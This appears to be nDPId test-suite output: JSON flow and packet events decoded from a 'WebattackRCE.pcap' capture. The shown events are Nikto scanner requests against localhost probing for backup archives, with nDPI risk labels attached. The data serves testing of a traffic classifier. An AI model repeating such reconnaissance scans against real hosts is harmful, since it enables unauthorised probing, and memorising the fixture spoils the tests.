-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1576420277173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277173,"pkt":"AAAAAAAAAAAAAAAACABFAADBJThAAEAGFv1\/AAABfwAAAcP4H5BkXx28+RQoaIAYAED+tQAAAQEICp1m\/N2dZvzdR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1576420277175,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277175,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/vR9AAEAGfxd\/AAABfwAAAcP6H5AAgoWRJHk9poAYAED+swAAAQEICp1m\/N+dZvzfR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1576420277176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277176,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/G85AAEAGIGl\/AAABfwAAAcP8H5A9SCNDeIAPvYAYAED+swAAAQEICp1m\/OCdZvzgR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1576420277177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277177,"pkt":"AAAAAAAAAAAAAAAACABFAADAz0lAAEAGbOx\/AAABfwAAAcP+H5CCs\/fKIUNf1IAYAED+tAAAAQEICp1m\/OGdZvzhR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1576420277179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277179,"pkt":"AAAAAAAAAAAAAAAACABFAADAZxxAAEAG1Rl\/AAABfwAAAcQAH5BgPl+VSob0sYAYAED+tAAAAQEICp1m\/OOdZvzjR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1576420277180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277180,"pkt":"AAAAAAAAAAAAAAAACABFAADGTHlAAEAG77Z\/AAABfwAAAcQCH5A4KXT5upP6C4AYAED+ugAAAQEICp1m\/OSdZvzkR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1576420277183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277183,"pkt":"AAAAAAAAAAAAAAAACABFAADGDUpAAEAGLuZ\/AAABfwAAAcQEH5BEmzXIVOhE3IAYAED+ugAAAQEICp1m\/OadZvzmR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1576420277184,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277184,"pkt":"AAAAAAAAAAAAAAAACABFAADAdAhAAEAGyC1\/AAABfwAAAcQGH5BYeUyXBV+uwoAYAED+tAAAAQEICp1m\/OidZvzoR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_packet_id":1,"flow_last_seen":1576420277185,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277185,"pkt":"AAAAAAAAAAAAAAAACABFAADACsVAAEAGMXF\/AAABfwAAAcQIH5AHdTJUhgOj64AYAED+tAAAAQEICp1m\/OmdZvzpR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":320,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277185,"flow_last_seen":1576420277185,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277185,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_packet_id":1,"flow_last_seen":1576420277186,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277186,"pkt":"AAAAAAAAAAAAAAAACABFAADEtSBAAEAGhxF\/AAABfwAAAcQKH5BCRY2PbjuWH4AYAED+uAAAAQEICp1m\/OqdZvzqR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":321,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277186,"flow_last_seen":1576420277186,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277186,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_packet_id":1,"flow_last_seen":1576420277187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277187,"pkt":"AAAAAAAAAAAAAAAACABFAADEwZ1AAEAGepR\/AAABfwAAAcQMH5B2JfkLbDSLWoAYAED+uAAAAQEICp1m\/OudZvzrR0VUIC8xMjcudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277187,"flow_last_seen":1576420277187,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277187,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277189,"flow_last_seen":1576420277189,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277189,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
